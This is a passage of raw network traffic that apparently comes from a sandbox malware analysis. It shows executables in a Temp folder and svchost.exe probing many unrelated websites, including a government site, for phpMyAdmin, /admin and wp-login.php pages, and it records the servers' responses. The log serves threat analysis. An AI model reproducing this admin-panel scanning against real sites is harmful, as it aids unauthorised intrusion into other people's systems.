                                                                                                                                                                                                                                                                                                                                                                set-cookie: sc-wcid=1b278517-6cee-4a55-8084-fc0802274316; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:16:13 GMT; Max-Age=86400; Secure
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: allow-from https://iframe.arkoselabs.com
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-cloud-trace-context: d2ed271555a5d8c116294615222ac5ad
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                server: API Gateway
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 664
                                                                                                                                                                                                                                                                                                                                                                via: 1.1 google, 1.1 google
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC664INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 69 74 75 6e 65 73 2d 61 70 70 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 2d 69 64 3d 34 34 37 31 38 38 33 37 30 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 26 62
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><meta charset="utf-8"><meta name="referrer" content="origin"><meta name="apple-itunes-app" content="app-id=447188370"><title>404 &b


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                235192.168.2.649734195.85.23.95443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC339OUTGET /PhpMyAdmin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ro.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_bm=sPlAOmI.SbF_K0Yty9SLocQQuQdWvCM6UlqNiDKSrHQ-1707131771-1-AZvJvOdJHH+VSfQDYfBdRd41atdb1A/vcpLWtYycbqzt0xc3vhWXbndMTivUeKm3/bUkXK+WsVKIU5M1CWciaxI=
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC858INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                set-cookie: bonga20120608=109d3c67844e2626e7238fbaf3bc9916; path=/; domain=.bongacams.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                set-cookie: ts_type2=1; expires=Tue, 04-Feb-2025 11:16:13 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                set-cookie: fv=Zmp3ZGZkAmN3ZD==; expires=Tue, 04-Feb-2025 11:16:13 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                set-cookie: uh=MSEJZ293o3OgEmMlZSScFzESBJALBD==; expires=Tue, 04-Feb-2025 11:16:13 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                location: /phpmyadmin
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                x-zone: 3-ded7546-web23
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd6f5d91457b-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC88INData Raw: 35 32 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 2f 70 68 70 6d 79 61 64 6d 69 6e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 52<html><head><meta http-equiv="refresh" content="0;url=/phpmyadmin"/></head></html>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                236192.168.2.65003613.249.120.4443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC165OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: tiktok.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC460INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.tiktok.com/admin
                                                                                                                                                                                                                                                                                                                                                                X-Cache: FunctionGeneratedResponse from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 d91dc6a660ec6bf6fc34949f578bd058.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL51-C1
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: WRn3_SkLrhjAA6tACmgoZFeospB0nUxxRcjWH0t8Q8Mql85OSVc-iw==
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                237192.168.2.6496903.141.96.53443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC174OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: money-farm.cc
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC113INHTTP/1.1 439 <none>
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                                                                                                                                                                                connection: close


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                238192.168.2.649693104.26.14.180443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC186OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: aeaaamorim.inovarmais.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC552INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OnqRHQ2azDFaFwyxwOdel74%2FugULTjZXjHMOtC6jKS2%2BLBjoQfNIPvC98bn6Zr30Scemkg%2BAzM0oyGl%2BSFz8eF%2FiDrt3kQdUaif93N5IUhKGFzrPF1wDylRfKBqS5pCrY3ENYAYciMHUtXE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd6fccbdb121-ATL
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC817INData Raw: 34 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 4dd<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC435INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not foun
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                239192.168.2.64971331.216.144.54437100C:\Users\user\AppData\Local\Temp\FE8B.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC157OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC969INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 2689
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: geoip=RO
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src 'self' data: blob: *.mega.co.nz *.mega.nz *.mega.io http://*.mega.co.nz http://*.mega.nz http://*.mega.io wss://*.karere.mega.nz wss://*.sfu.mega.co.nz *.karere.mega.nz:1380 http://127.0.0.1:6341 localhost.megasyncloopback.mega.nz:6342; script-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob:; style-src 'self' 'unsafe-inline' *.mega.co.nz *.mega.nz *.mega.io data: blob:; frame-src 'self' *.megapay.nz mega: *.megaad.nz https://mega.nz/ https://mega.io/; img-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Connection: Close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC2689INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4d 45 47 41 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 45 47 41 20 70 72 6f 76 69 64 65 73 20 66 72 65 65 20 63 6c 6f 75 64 20 73 74 6f 72 61 67 65 20 77 69 74 68 20 63 6f 6e 76 65 6e 69 65 6e 74 20 61 6e 64 20 70 6f 77 65 72 66 75 6c 20 61 6c 77 61 79 73 2d 6f 6e 20 70 72 69 76 61 63 79 2e 20 43 6c 61 69 6d 20 79 6f 75 72 20 66 72 65 65 20 32 30 47 42 20 6e 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><title>MEGA</title><meta name="description" content="MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now" /><meta property="og:title


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                240192.168.2.64972423.4.32.2164432156C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC180OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC202INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://steamcommunity.com
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                241192.168.2.649739177.74.1.157443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC179OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sistemas.pa.gov.br
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC164INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC196INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                242192.168.2.649723142.250.105.844432156C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC180OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC842INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
